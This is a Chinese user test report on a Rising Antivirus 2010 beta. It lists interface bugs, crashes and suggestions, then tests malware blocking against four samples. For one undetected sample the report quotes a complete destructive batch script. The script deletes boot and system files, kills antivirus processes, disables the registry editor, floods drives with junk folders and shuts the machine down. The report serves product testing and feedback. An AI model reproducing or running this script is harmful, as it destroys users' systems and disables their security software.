瑞星杀毒软件2010测试报告(6月25日)
测试环境:
操作系统:WindowsXP pro SP3(虚拟机)
内存:224MB
瑞星程序版本:22.00.00.07
病毒库版本:22.01.03.03
测试内容:
一BUG反馈
点击“刷新”按钮,页面刷新速率较慢,可看明显看到页面残缺(如上图抓怕到的一瞬间)。建议调整刷新速率。
引擎查杀病毒包时,点击“不作处理”,结果卡死。发生错误,监控退出。
同上,瑞星杀毒软件失去了响应。
同上。
测试中还发生过以下错误:
查杀信息处存在BUG
没有显示正在查杀哪个文件夹。
二建议反馈
主页中的信息内容,为什么不单独做一个窗口供用户选择是否查看呢?目前,主页的很大部分面积被资讯占据,这是种浪费啊,信息中心的价值不大,建议在下一个版本中修改,千万别守着这个习惯不改。独立出的资讯中心,可以通过点击小绿伞弹出的菜单点开。
“未扫描或修复漏洞”能不能不添加到检测目标到中啊?因为不是每个安装杀毒软件都想安装卡卡。不安装卡卡,又总说存在风险。
家庭模式的解释文字位置建议调整。
“清除病毒”“不处理”按钮建议支持键盘操作,方便用户使用。
像千千静听这样常用的软件防火墙都不能识别,是不是有点说不过去啊?建议将防火墙纳入云安全系统,生成一份白名单,这样能提高防火墙的效率。
这个电脑防护的日志实在令人看不懂,到底阻止了什么,根本看不出啊。是不是该改改??
三木马行为防御测试
设置:文件监控关闭。系统加固,木马行为防御等开启,且处于默认设置。
样本一:感染型病毒。
文件名:explorer.exe
成功拦截。
样本二:恶意程序
文件名:谁点谁知道.bat
木马行为防御未报毒,系统加固未报毒。
批处理文件内容:
attrib -r -h -s c:\ntldr
attrib -r -h -s c:\*.sys
del c:\ntldr
del c:\*.sys
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
taskkill /f /im MPMon.exe /t
taskkill /f /im MPSVC1.exe/t
taskkill /f /im MPSVC2.exe/t
taskkill /f /im MPSVC.exe/t
attrib -r -h -s C:\windows\*.exe
attrib -r -h -s C:\windows\system32\*.exe
attrib -r -h -s C:\windows\system32\*.cpl
del C:\windows\*.exe
del C:\windows\system32\*.exe
del C:\windows\system32\*.cpl
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
Shutdown
date 2099-10-10
本人知识水平不足,推测该批处理删除所有驱动文件。
添加注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
搜索所有系统目录下的exe文件并删除。
在各个分区,创建大量的歧义文件夹,消耗用户资源。
修改时间。
这个病毒最变态的就是产生大量歧义文件,很恶心。瑞星对此类恶意程序要加强拦截力度。
样本三:伪数字签名病毒
文件名:new.exe
成功拦截。
样本四:后门病毒
文件名:1.exe
运行后,木马行为防御未报毒。注册表编辑器被禁用。
虚拟机中明明没有打开IE,却有IE的进程。
用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
